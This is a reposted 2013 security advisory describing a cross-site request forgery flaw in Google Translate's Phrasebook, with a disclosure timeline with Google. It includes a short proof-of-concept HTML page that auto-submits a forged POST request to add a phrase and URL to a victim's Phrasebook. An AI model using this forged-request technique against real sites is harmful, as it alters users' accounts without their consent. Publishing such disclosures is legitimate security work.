Home / exploits Google Translate Cross Site Request Forgery
Posted on 22 June 2013
+------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Google Translate CSRF Vulnerability # Date : 06/20/2013 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Affected Web site : http://translate.google.com # Original Advisory: : http://www.webapp-security.com/2013/06/translate-google-com-csrf-vulnerability/ +------------------------------------------------------------------------------------------------------------------------------------------+ Summary 1)Vulnerability Description 2)Exploit 3)Vulnerability Timeline +------------------------------------------------------------------------------------------------------------------------------------------+ 1)Vulnerability Description I discovered a new CSRF vulnerability on translate.google.com web site which could allow an attacker to insert items (Words/Phrases/Urls and related translations) into the user's Phrasebook. Furthermore an attacker could also inserta potentially malicious Urls - into the above mentioned Phrasebook - towards which the victim could be redirected simply clicking on the "Go to <website>" right-click option on translate.google.com. The vulnerability is related to a problem into the generation of the "xt" anti-CSRF token which is not correctly associated with the user session, allowing to use any previous generated anti-CSRF parameter - for that specific user- in order to carry out this attack. 2)Exploit Following a simply exploit in order to insert, into a Phrasebook, the new phrase "word_example" and the url "www.ivanobinetti.com" (my blog) as translation: <html> <body onload="javascript:document.forms[0].submit()"> <form method="POST" name="form0" action="http://translate.google.com/translate_a/sg?client=t&cm=a&sl=en&tl=it&ql=4&hl=en&xt=<anti-CSRF token"> <input type="hidden" name="q" value="word_example"/> <input type="hidden" name="utrans" value="www.ivanobinetti.com"/> </form> </body> </html> Note: executing the exploit the victim will receive the message to open or download a "sg" file. Even if the victim does not open or download this file the new item will be added into the Phrasebook. 3)Vulnerability Timeline 04/12/2013: Exploit has been sent to Google security team (security@google.com) 04/12/2013: First prompt reply from Google security team telling me that the exploit does not work 04/12/2013: My reply explaining the details of the vulnerability and related exploit 04/13/2013: Google security team contacted me admitting the vulnerability and that they were considering if assign me a reward 04/17/2013: Google security team told me that the vulnerability/problem was already known by Google and that no reward there would been for me :( 06/20/2013: After more than 2 months I checked that the problem is still in place, so I decided to publish the vulnerability
